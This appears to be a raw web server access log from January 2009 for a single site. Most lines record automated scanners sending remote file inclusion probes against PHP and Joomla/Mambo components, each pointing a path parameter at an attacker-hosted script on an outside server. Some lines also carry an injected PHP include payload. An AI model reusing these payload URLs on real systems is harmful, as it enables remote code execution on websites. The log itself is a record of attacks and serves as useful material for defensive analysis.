207.182.137.218 - - [04/Jan/2009:08:25:53 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95176 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:25:55 -0800] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:25:56 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 94838 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:25:56 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:25:59 -0800] "GET /logs/access_080509.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:26:26 -0800] "GET /logs/access_080522.log///auto.php?inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:26:28 -0800] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:26:28 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.12 - - [04/Jan/2009:08:26:28 -0800] "GET /logs/access_081118.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:26:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:26:42 -0800] "GET //calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:26:49 -0800] "GET //calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:27:13 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.169 - - [04/Jan/2009:08:27:16 -0800] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:27:24 -0800] "GET /logs/access_081011.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:27:25 -0800] "GET //calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:27:25 -0800] "GET /logs///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:27:28 -0800] "GET /logs/access_080912.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:27:30 -0800] "GET /logs/access_080912.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:27:30 -0800] "GET //calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.58.12 - - [04/Jan/2009:08:27:31 -0800] "GET /logs/access_081114.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:27:31 -0800] "GET /logs///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:27:35 -0800] "GET /logs/access_081011.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.9.229 - - [04/Jan/2009:08:27:38 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
81.208.9.229 - - [04/Jan/2009:08:27:39 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt?? HTTP/1.1" 200 95097 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:27:39 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:27:39 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:27:40 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:27:43 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:27:44 -0800] "GET //avatar.php?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:27:46 -0800] "GET /logs/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:27:47 -0800] "GET /modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:28:00 -0800] "GET /logs///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:28:00 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:28:03 -0800] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:28:04 -0800] "GET /logs/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:28:06 -0800] "GET /modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:28:14 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:28:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:28:18 -0800] "GET /logs/db.php?path_local=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:28:18 -0800] "GET /db.php?path_local=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:08:28:43 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:28:49 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:28:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:28:49 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:28:49 -0800] "GET /logs/access_080530.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:28:49 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:28:50 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95160 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:28:50 -0800] "GET /logs/access_080922.log///language.inc.php?langs_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:28:52 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:28:52 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:28:52 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:28:58 -0800] "GET /logs/access_081108.log//index.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.1.142.10 - - [04/Jan/2009:08:29:02 -0800] "GET /logs/access_081114.log//admin/business_inc/saveserver.php?thisdir=http://www.grasso59.altervista.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:29:03 -0800] "GET /logs/access_080211.log///bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:29:06 -0800] "GET /logs/access_080509.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:29:09 -0800] "GET //bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:29:14 -0800] "GET /logs///bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:29:20 -0800] "GET /logs/access_080507.log///bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:08:29:21 -0800] "GET /logs/access_081114.log//include/admin.lib.inc.php?site_path=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:29:23 -0800] "GET /logs/access_081123.log//?path[docroot]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:29:24 -0800] "GET /?path[docroot]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 94812 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:29:26 -0800] "GET /logs//?path[docroot]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 80891 "-" "libwww-perl/5.68" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:29:30 -0800] "GET /logs/access_080409.log/upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.52.32.115 - - [04/Jan/2009:08:29:31 -0800] "GET /logs/access_071222.log/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.52.32.115 - - [04/Jan/2009:08:29:31 -0800] "GET /errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.52.32.115 - - [04/Jan/2009:08:29:31 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:29:35 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:29:38 -0800] "GET /logs/access_080502.log//?path[docroot]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
201.52.32.115 - - [04/Jan/2009:08:29:39 -0800] "GET /logs/access_080227.log/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:29:41 -0800] "GET /logs/access_080409.log/upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:29:44 -0800] "GET /logs/access_080204.log//index2.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:29:45 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:29:45 -0800] "GET /logs//index2.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:29:45 -0800] "GET /logs///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:29:46 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:29:48 -0800] "GET /logs/access_080614.log//index2.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:08:29:49 -0800] "GET /logs/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.116.224.229 - - [04/Jan/2009:08:29:49 -0800] "GET /errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.116.224.229 - - [04/Jan/2009:08:29:49 -0800] "GET /logs/access_071222.log/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.116.224.229 - - [04/Jan/2009:08:29:49 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:08:29:49 -0800] "GET /index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 200 94801 "-" "libwww-perl/5.808" "www.dmulk.com"
59.120.3.108 - - [04/Jan/2009:08:30:10 -0800] "GET /logs/access_080504.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.120.3.108 - - [04/Jan/2009:08:30:10 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.224.229 - - [04/Jan/2009:08:30:10 -0800] "GET /logs/access_080227.log/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.120.3.108 - - [04/Jan/2009:08:30:10 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.66.239.241 - - [04/Jan/2009:08:30:16 -0800] "GET /logs/access_080521.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.66.239.241 - - [04/Jan/2009:08:30:16 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.66.239.241 - - [04/Jan/2009:08:30:17 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:30:24 -0800] "GET /logs///bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:30:30 -0800] "GET //bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:30:38 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:30:38 -0800] "GET /galeria.php?start=0&kategoria=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:30:44 -0800] "GET /logs/access_080711.log///appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:30:51 -0800] "GET //appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:30:51 -0800] "GET //calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:30:57 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:31:03 -0800] "GET /logs/access_080204.log//index2.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:31:04 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:31:04 -0800] "GET /logs//index2.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:31:04 -0800] "GET /logs/access_080614.log//index2.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:08:31:12 -0800] "GET /blog/index.php/feed/?show=gallery&nggpage=3 HTTP/1.1" 200 9820 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:31:28 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:31:28 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:31:28 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:31:29 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
